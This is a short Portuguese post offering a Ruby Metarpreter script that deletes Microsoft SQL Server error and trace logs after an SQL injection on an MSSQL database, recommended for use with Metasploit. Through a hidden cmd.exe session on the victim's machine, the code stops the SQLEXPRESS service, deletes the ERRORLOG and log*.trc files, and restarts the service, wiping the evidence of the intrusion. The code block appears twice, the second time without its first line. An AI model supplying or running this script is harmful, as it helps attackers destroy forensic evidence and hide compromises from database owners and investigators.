Um script em Ruby para apagar logs apos uma injeção em DB’s MSSQL.
Recomendo usar com metasploit.
Autor: ZERO COLD
Recomendo usar com metasploit.
01 def list_exec(session,cmdlst)
02 print_status("Running Command List ...")
03 r=''
04 session.response_timeout=120
05 cmdlst.each do |cmd|
06 begin
07 print_status "running command #{cmd}"
08 r = session.sys.process.execute("cmd.exe /c #{cmd}", nil, {'Hidden' => true, 'Channelized' => true})
09 while(d = r.channel.read)
10
11 print_status("#{d}")
12 end
13 r.channel.close
14 r.close
15 rescue ::Exception => e
16 print_error("Error Running Command #{cmd}: #{e.class} #{e}")
17 end
18 end
19 end
20
21 commands = ['Net STOP "SQL Server (SQLEXPRESS)" ',
22 'del "C:\Program Files\Microsoft SQL Server\MSSQL.1\MSSQL\LOG\ERRORLOG.*"',
23 'del "C:\Program Files\Microsoft SQL Server\MSSQL.1\MSSQL\LOG\log*.trc"',
24 'Net START "SQL Server (SQLEXPRESS)"']
25
26 list_exec(client,commands)
02 print_status("Running Command List ...")
03 r=''
04 session.response_timeout=120
05 cmdlst.each do |cmd|
06 begin
07 print_status "running command #{cmd}"
08 r = session.sys.process.execute("cmd.exe /c #{cmd}", nil, {'Hidden' => true, 'Channelized' => true})
09 while(d = r.channel.read)
10
11 print_status("#{d}")
12 end
13 r.channel.close
14 r.close
15 rescue ::Exception => e
16 print_error("Error Running Command #{cmd}: #{e.class} #{e}")
17 end
18 end
19 end
20
21 commands = ['Net STOP "SQL Server (SQLEXPRESS)" ',
22 'del "C:\Program Files\Microsoft SQL Server\MSSQL.1\MSSQL\LOG\ERRORLOG.*"',
23 'del "C:\Program Files\Microsoft SQL Server\MSSQL.1\MSSQL\LOG\log*.trc"',
24 'Net START "SQL Server (SQLEXPRESS)"']
25
26 list_exec(client,commands)
Autor: ZERO COLD